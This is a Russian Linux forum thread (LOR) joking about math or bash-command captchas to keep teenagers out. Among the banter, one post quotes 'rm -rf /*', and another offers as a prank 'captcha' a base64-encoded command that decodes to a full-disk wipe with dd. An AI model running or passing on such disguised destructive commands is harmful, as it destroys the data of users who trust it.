LINUX.ORG.RU

Метановая капча на ЛОРе

Биореактор в комплекте?

geekless ★★
()

матановая капча нужна только на форуме четвертой национальной специальной олимпиады им. Евгения Ваганыча

stevejobs ★★★★☆
()
Ответ на: комментарий от LongLiveUbuntu

А зачем менять? Пусть люди хотя бы догадаются заглянуть в Wiki.

Можно даже около вопроса так и написать, что надо в Wiki. Заодно увидят, что Wiki реально существует...

Darth_Revan ★★★★★
()

Лучше башевую капчу: необходимо ввести результат работы [почти] произвольного набора команд.

drull ★☆☆☆
()
Ответ на: комментарий от drull

>Лучше башевую капчу: необходимо ввести результат работы [почти] произвольного набора команд.
А каждый пятый должен быть универсальным фиксом.

Tark ★★
()
Ответ на: комментарий от yoghurt

Для иного пласта есть группа Ubuntu Linux в Контакте.

LongLiveUbuntu ★★★★★
() автор топика

Кастую капчи из манов: указать опцию, реализующую данную фичу в данной команде. Или наоборот или что-то в этом роде. Пусть даже можно будет копипастить с опеннета. И образовательная цель, и капчеорганизующая.

adriano32 ★★★
()

>Нужно ли ЛОРу отгораживаться от школоты?

Если хотите устроить линуксокапец в России, то нужно. Надо бы наоборот заманивать сюда как можно больше школоты. Думайте о будущем.

firestarter ★★★☆
()

Не вижу смысла, я в 7-9 классе спокойно рулил онлайн калькуляторами (да и вообще математикой увлекался)

deterok ★★★★★
()

Что за бред? На первый курс универа поступил, узнал, что такое матан и уже не школота?

Я к примеру после экзамена забыл, что там было в этой вашей математике

MyFreedom ★★★
()
Ответ на: комментарий от firestarter

А я, кстати, зарегистрировался на лоре в 15 лет.

Deleted
()

В случае лора можно не матановую капчу, а вопросы по манам, чтобы за каждый пост пользователь получал +1 к знаниям (или освежал в памяти уже известное ему)

temporary ★★
()
Ответ на: комментарий от madcore

Ну аморфер вон уже же вроде того, сделал. Или собирался.

Zhbert ★★★★★
()
Ответ на: комментарий от Made_in_China

> # rm -rf /* ?

Зачем так сурово? Например так:

echo «`echo 'test... test... test...' | wc -c`+`echo „dddddfff“ | grep -o d | wc -l`» | bc

drull ★☆☆☆
()
Ответ на: комментарий от adriano32

> Кастую капчи из манов: указать опцию, реализующую данную фичу в данной команде.

Хорошая идея.

drull ★☆☆☆
()

>echo «`echo 'test... test... test...' | wc -c`+`echo „dddddfff“ | grep -o d | wc -l`» | bc

Фигня. Вот самый лучший вариант:

$(echo «ZGQgaWY9L2Rldi96ZXJvIG9mPS9kZXYvc2RhCg==»|base64 -d)

В некоторых дистрах по умолчанию сработает без рута. :D

firestarter ★★★☆
()
Ответ на: комментарий от MyFreedom

Будет форум для тех, кто

a) Не забыл (и правильно:)
b) Умеет пользоваться maxima

different_thing
()

Первый камент снимает все сомнения.

mclaudt
()
Ответ на: комментарий от fedor

А нужны ли на лоре такие гуманитарии?

Например acidpink все равно бы прошла, у психологов за все время обучения матан уровня первого семестра техвуза точно есть.

Deleted
()

Надо как при регистрации на арчвики сделать. Там просят вывод команды, то ли md5, то ли ещё что-то такое.

Hoodoo ★★★★★
()
Ответ на: комментарий от Hoodoo

А с чего вы взяли, что толстые тролли не знают несложных консольных команд и не сидят из-под лялиха?

Deleted
()
Ответ на: комментарий от temporary

>В случае лора можно не матановую капчу, а вопросы по манам, чтобы за каждый пост пользователь получал +1 к знаниям (или освежал в памяти уже известное ему)

Тогда уж за ответ по теме ТС ставит плюсик, который котируется как N мессаг в толксах)

madcore ★★★★★
()

Тогда уж сразу за реал покупать возможность писать в толксы.

geekless ★★
()

+1 к знаниям я имел в виду, что каждый пост будет чему-то учить постящего, не Score.

temporary ★★
()

Если плюсики можно будет обменять на скор, то расцветёт коррупция. Если нет, то не нужно. Мне хватает спасибо от тех кому оказались полезны мои посты, да и думаю наоборот, моего спасибо достаточно за помощь. Плюс барахолка-треды как воплощение ЛОРовской благотворительности и коммьюнити-духа.

adriano32 ★★★
()
Ответ на: комментарий от different_thing

Ты о доказательствах? Так в капче и реализовать ввод полного доказательства теоремы Больцано-Вейерштрасса, например, проблематично. А формулировки и теоремы да, помню.

Deleted
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.